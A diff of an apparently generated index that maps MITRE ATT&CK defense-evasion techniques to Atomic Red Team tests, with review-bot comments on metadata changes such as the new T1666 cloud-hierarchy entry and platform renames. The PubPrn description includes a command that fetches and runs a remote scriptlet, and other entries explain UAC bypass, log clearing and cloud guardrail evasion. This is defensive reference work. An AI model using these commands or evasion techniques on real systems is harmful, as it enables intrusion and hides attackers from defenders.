@@ -1209,7 +1225,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1222.002
atomic_tests:
- name: chmod - Change file or folder mode (numeric mode)
@@ -1598,7 +1613,7 @@ defense-evasion:
Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second script:
parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct
. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
In later versions of Windows (10+), PubPrn.vbs
has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://
, vice the script:
moniker which could be used to reference remote code via HTTP(S).
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-18T14:55:35.817Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Signed Script Proxy Execution: Pubprn'
x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -1617,7 +1632,6 @@ defense-evasion:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1216.001
atomic_tests:
- name: PubPrn.vbs Signed Script Bypass
@@ -1726,7 +1740,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1006:
technique:
@@ -1784,7 +1797,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1006
atomic_tests:
- name: Read volume boot sector via DOS device path (PowerShell)
@@ -1815,9 +1827,85 @@ defense-evasion:
Format-Hex -InputObject $buffer
name: powershell
elevation_required: true
+ T1666:
+ technique:
+ modified: '2024-09-25T16:15:41.224Z'
+ name: Modify Cloud Resource Hierarchy
+ description: "Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service
+ (IaaS) environments in order to evade defenses. \n\nIaaS environments often
+ group resources into a hierarchy, enabling improved resource management and
+ application of policies to relevant groups. Hierarchical structures differ
+ among cloud providers. For example, in AWS environments, multiple accounts
+ can be grouped under a single organization, while in Azure environments, multiple
+ subscriptions can be grouped under a single management group.(Citation: AWS
+ Organizations)(Citation: Microsoft Azure Resources)\n\nAdversaries may add,
+ delete, or otherwise modify resource groups within an IaaS hierarchy. For
+ example, in Azure environments, an adversary who has gained access to a Global
+ Administrator account may create new subscriptions in which to deploy resources.
+ They may also engage in subscription hijacking by transferring an existing
+ pay-as-you-go subscription from a victim tenant to an adversary-controlled
+ tenant. This will allow the adversary to use the victim’s compute resources
+ without generating logs on the victim tenant.(Citation: Microsoft Peach Sandstorm
+ 2023)(Citation: Microsoft Subscription Hijacking 2022)\n\nIn AWS environments,
+ adversaries with appropriate permissions in a given account may call the `LeaveOrganization`
+ API, causing the account to be severed from the AWS Organization to which
+ it was tied and removing any Service Control Policies, guardrails, or restrictions
+ imposed upon it by its former Organization. Alternatively, adversaries may
+ call the `CreateAccount` API in order to create a new account within an AWS
+ Organization. This account will use the same payment methods registered to
+ the payment account but may not be subject to existing detections or Service
+ Control Policies.(Citation: AWS RE:Inforce Threat Detection 2024)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Modification'
+ type: attack-pattern
+ id: attack-pattern--0ce73446-8722-4086-9d43-514f1d0f669e
+ created: '2024-09-25T14:16:19.234Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1666
+ external_id: T1666
+ - source_name: AWS Organizations
+ description: AWS. (n.d.). Terminology and concepts for AWS Organizations.
+ Retrieved September 25, 2024.
+ url: https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+ - source_name: Microsoft Subscription Hijacking 2022
+ description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
+ using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
+ url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
+ - source_name: Microsoft Azure Resources
+ description: Microsoft Azure. (2024, May 31). Organize your Azure resources
+ effectively. Retrieved September 25, 2024.
+ url: https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-setup-guide/organize-resources
+ - source_name: Microsoft Peach Sandstorm 2023
+ description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
+ password spray campaigns enable intelligence collection at high-value targets.
+ Retrieved September 18, 2023.
+ url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1564.008:
technique:
- modified: '2023-10-16T16:41:53.957Z'
+ modified: '2024-10-15T15:56:27.592Z'
name: 'Hide Artifacts: Email Hiding Rules'
description: |-
Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the New-InboxRule
or Set-InboxRule
[PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)
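Review bot: the new T1666 (Modify Cloud Resource Hierarchy) entry lands with `x_mitre_detection: ''` and `atomic_tests: []`, so it enters the index as a defense-evasion technique with no test and no detection text. The only signal named is the data source 'Cloud Service: Cloud Service Modification'; the description itself identifies the events a defender would watch for (the AWS `LeaveOrganization` and `CreateAccount` calls, and Azure subscription creation or transfer out of the tenant). Fine as an upstream mirror, but the commit message should call out the new technique instead of letting it hide inside a timestamp refresh. The platform list being only `IaaS` matches the description's own scoping to IaaS environments.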
@@ -1843,11 +1931,10 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
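Review bot: the platform list for T1564.008 replaces `Office 365` and `Google Workspace` with the single value `Office Suite`. Any platform-keyed index derived from `x_mitre_platforms` will stop listing this technique under the old names, and the existing test 'New-Inbox Rule to Hide E-mail in M365' is still an Office 365-specific test, so whatever consumes the platform field for test selection needs to be checked against the new name in the same change.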
@@ -1892,7 +1979,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.008
atomic_tests:
- name: New-Inbox Rule to Hide E-mail in M365
@@ -1948,7 +2034,7 @@ defense-evasion:
elevation_required: false
T1027.013:
technique:
- modified: '2024-04-19T04:03:07.164Z'
+ modified: '2024-10-15T16:32:45.108Z'
name: Encrypted/Encoded File
description: "Adversaries may encrypt or encode files to obfuscate strings,
bytes, and other specific patterns to impede detection. Encrypting and/or
@@ -2019,11 +2105,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1014:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:50.568Z'
name: Rootkit
description: "Adversaries may use rootkits to hide the presence of programs,
files, network connections, services, drivers, and other system components.
@@ -2091,7 +2176,6 @@ defense-evasion:
url: https://en.wikipedia.org/wiki/Rootkit
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1014
atomic_tests:
- name: Loadable Kernel Module based Rootkit
@@ -2303,7 +2387,7 @@ defense-evasion:
url: https://www.seqrite.com/blog/how-to-avoid-dual-attack-and-vulnerable-files-with-double-extension/
description: Seqrite. (n.d.). How to avoid dual attack and vulnerable files
with double extension?. Retrieved July 27, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-14T21:09:59.588Z'
name: 'Masquerading: Double File Extension'
description: "Adversaries may abuse a double extension in the filename as a
means of masquerading the true file type. A file name may include a secondary
@@ -2340,8 +2424,6 @@ defense-evasion:
x_mitre_data_sources:
- 'File: File Creation'
- 'File: File Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1036.007
atomic_tests:
- name: File Extension Masquerading
@@ -2419,7 +2501,7 @@ defense-evasion:
name: command_prompt
T1548.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:35:39.112Z'
name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
description: |-
Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -2520,7 +2602,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.002
atomic_tests:
- name: Bypass UAC using Event Viewer (cmd)
@@ -3221,7 +3302,7 @@ defense-evasion:
description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
Does. Retrieved March 19, 2018.
source_name: cybereason osx proton
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-14T16:28:19.781Z'
name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
description: |-
Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -3255,8 +3336,6 @@ defense-evasion:
- User
x_mitre_effective_permissions:
- root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1548.003
atomic_tests:
- name: Sudo usage
@@ -3374,7 +3453,7 @@ defense-evasion:
sudo visudo -c -f /usr/local/etc/sudoers
T1578:
technique:
- modified: '2023-09-05T20:45:22.041Z'
+ modified: '2024-09-30T13:28:37.414Z'
name: Modify Cloud Compute Infrastructure
description: |-
An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.
@@ -3426,12 +3505,11 @@ defense-evasion:
- source_name: Mandiant M-Trends 2020
description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
2020.
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1542.001:
technique:
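Review bot: same pattern as the stormshield reference earlier: the M-Trends 2020 URL moves from content.fireeye.com to www.mandiant.com but 'Retrieved April 24, 2020' stays unchanged. The 3.1.0 -> 3.2.0 attack-spec bump on T1578 is paired with the `modified` change in the preceding hunk, so that part is consistent.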
@@ -3511,7 +3589,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1542.001
atomic_tests:
- name: UEFI Persistence via Wpbbin.exe File Creation
@@ -3532,7 +3609,7 @@ defense-evasion:
elevation_required: true
T1574.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:42:48.016Z'
name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
description: |-
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -3551,7 +3628,6 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Matthew Demaske, Adaptforward
@@ -3565,7 +3641,6 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -3592,8 +3667,8 @@ defense-evasion:
external_id: T1574.011
- source_name: Tweet Registry Perms Weakness
description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
- April 9, 2018."
- url: https://twitter.com/r0wdy_/status/936365549553991680
+ September 12, 2024."
+ url: https://x.com/r0wdy_/status/936365549553991680
- source_name: insecure_reg_perms
description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -3624,7 +3699,8 @@ defense-evasion:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.011
atomic_tests:
- name: Service Registry Permissions Weakness
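Review bot: `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref`, removed from T1574.011 in the two preceding hunks, reappear here at the end of the object with the spec version bumped 2.1.0 -> 3.2.0, so this is a key reorder plus a bump rather than a loss; the reviewer has to read three hunks to confirm that. A fixed key order in the generator would have made this a two-line diff.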
@@ -3740,7 +3816,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1218.013:
technique:
@@ -3793,7 +3868,7 @@ defense-evasion:
PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would
inject an import table entry consisting of the specified DLL into the module
at the given base address.(Citation: Mavinject Functionality Deconstructed)"
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T17:35:08.315Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Mavinject
x_mitre_detection: |-
@@ -3809,11 +3884,10 @@ defense-evasion:
- 'Process: Process Creation'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.005:
technique:
- modified: '2023-09-14T21:12:48.409Z'
+ modified: '2024-09-12T19:30:45.064Z'
name: 'Masquerading: Match Legitimate Name or Location'
description: |-
Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
@@ -3859,8 +3933,8 @@ defense-evasion:
external_id: T1036.005
- source_name: Twitter ItsReallyNick Masquerading Update
description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
- Retrieved April 22, 2019.
- url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/1055321652777619457
- source_name: Docker Images
description: Docker. (n.d.). Docker Images. Retrieved April 6, 2021.
url: https://docs.docker.com/engine/reference/commandline/images/
@@ -3870,9 +3944,8 @@ defense-evasion:
url: https://www.elastic.co/blog/how-hunt-masquerade-ball
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036.005
atomic_tests:
- name: Execute a process from a directory masquerading as the current parent
@@ -3954,7 +4027,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T22:37:49.258Z'
name: Weaken Encryption
description: |-
Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)
@@ -3978,8 +4051,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1036.008:
technique:
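Review bot: dropping `x_mitre_attack_spec_version: 2.1.0` together with `spec_version` leaves Weaken Encryption with no attack spec version at all, while the hunk just above bumps T1036.005 to 3.2.0. The same double removal recurs below for T1562.009, TFTP Boot, T1070.002, T1218.004 and T1600.001, and it is the same set of techniques whose `modified` dates went backwards, so check both against the source; if the field is genuinely absent upstream for these older objects, a one-line note in the PR saying so would save the next reviewer the same question.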
@@ -4043,11 +4114,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564:
technique:
- modified: '2024-03-29T17:45:48.126Z'
+ modified: '2024-10-15T15:58:49.815Z'
name: Hide Artifacts
description: |-
Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)
@@ -4068,8 +4138,8 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Metadata'
- 'Application Log: Application Log Content'
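Review bot: the platform rename from `Office 365` to `Office Suite` (with the version bump to 1.3) changes the value that per-platform index generation keys on. Make sure whatever builds the platform-specific indexes recognises `Office Suite`, and likewise `Identity Provider` introduced for T1484.002 further down, or this technique silently drops out of those indexes.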
@@ -4113,7 +4183,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564
atomic_tests:
- name: Extract binary files via VBA
@@ -4250,7 +4319,7 @@ defense-evasion:
elevation_required: false
T1484.002:
technique:
- modified: '2024-04-19T04:27:51.388Z'
+ modified: '2024-09-25T13:50:11.593Z'
name: Domain Trust Modification
description: "Adversaries may add new domain trusts, modify the properties of
existing domain trusts, or otherwise change the configuration of trust relationships
@@ -4270,9 +4339,14 @@ defense-evasion:
trust modifications such as altering the claim issuance rules to log in any
valid set of credentials as a specified user.(Citation: AADInternals zure
AD Federated Domain) \n\nAn adversary may also add a new federated identity
- provider to an identity tenant such as Okta, which may enable the adversary
- to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
- 2023)"
+ provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+ may enable the adversary to authenticate as any user of the tenant.(Citation:
+ Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+ gain broad access into a variety of cloud-based services that leverage the
+ identity tenant. For example, in AWS environments, an adversary that creates
+ a new identity provider for an AWS Organization will be able to federate into
+ all of the AWS Organization member accounts without creating identities for
+ each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
@@ -4292,9 +4366,8 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '2.0'
+ - Identity Provider
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
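Review bot: `Azure AD` and `SaaS` are replaced by the single platform `Identity Provider`; the x_mitre_version bump to 2.1 is consistent with that, but any filter or index that still looks for `Azure AD` will no longer match T1484.002. Check the platform index generation for the new value before merging.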
@@ -4311,6 +4384,10 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1484/002
external_id: T1484.002
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
- source_name: CISA SolarWinds Cloud Detection
description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -4344,7 +4421,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.002
atomic_tests:
- name: Add Federation to Azure AD
@@ -4490,7 +4566,7 @@ defense-evasion:
url: https://docs.microsoft.com/windows-server/administration/windows-commands/bootcfg
description: Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August
30, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-31T14:51:47.352Z'
name: 'Impair Defenses: Safe Boot Mode'
description: |-
Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)
@@ -4518,8 +4594,6 @@ defense-evasion:
- Anti-virus
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1562.009
atomic_tests:
- name: Safe Mode Boot
@@ -4573,7 +4647,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
Information. Retrieved October 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T16:35:53.806Z'
name: TFTP Boot
description: |-
Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -4597,12 +4671,10 @@ defense-evasion:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1497.001:
technique:
- modified: '2024-04-19T12:49:40.919Z'
+ modified: '2024-09-12T15:50:18.047Z'
name: 'Virtualization/Sandbox Evasion: System Checks'
description: "Adversaries may employ various system checks to detect and avoid
virtualization and analysis environments. This may include changing behaviors
@@ -4692,13 +4764,12 @@ defense-evasion:
url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
- source_name: Deloitte Environment Awareness
description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1497.001
atomic_tests:
- name: Detect Virtualization Environment (Linux)
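Review bot: the Deloitte reference URL gains an `/edit` suffix; for a Google Drive file link that is the editor view, which may prompt for sign-in, whereas the bare `/file/d/<id>` form is what a reader without access rights expects. Confirm the new URL opens anonymously before replacing the old one; the refreshed retrieval date (September 13, 2024) is otherwise consistent with the change.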
@@ -4801,7 +4872,7 @@ defense-evasion:
url: https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/
description: Marcel. (2018, April 19). 12 Critical Linux Log Files You Must
be Monitoring. Retrieved March 29, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-29T21:23:51.886Z'
name: 'Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs'
description: |
Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the /var/log/
directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)
@@ -4826,8 +4897,6 @@ defense-evasion:
- 'File: File Deletion'
- 'File: File Modification'
- 'Command: Command Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1070.002
atomic_tests:
- name: rm -rf
@@ -5353,7 +5422,7 @@ defense-evasion:
- source_name: LOLBAS Installutil
url: https://lolbas-project.github.io/lolbas/Binaries/Installutil/
description: LOLBAS. (n.d.). Installutil.exe. Retrieved July 31, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:47:52.603Z'
name: 'Signed Binary Proxy Execution: InstallUtil'
description: |-
Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v\InstallUtil.exe
and C:\Windows\Microsoft.NET\Framework64\v\InstallUtil.exe
.
@@ -5379,8 +5448,6 @@ defense-evasion:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.004
atomic_tests:
- name: CheckIfInstallable method call
@@ -5989,18 +6056,17 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.001:
technique:
- modified: '2024-04-18T22:54:54.668Z'
+ modified: '2024-09-30T17:32:59.948Z'
name: 'Hijack Execution Flow: DLL Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
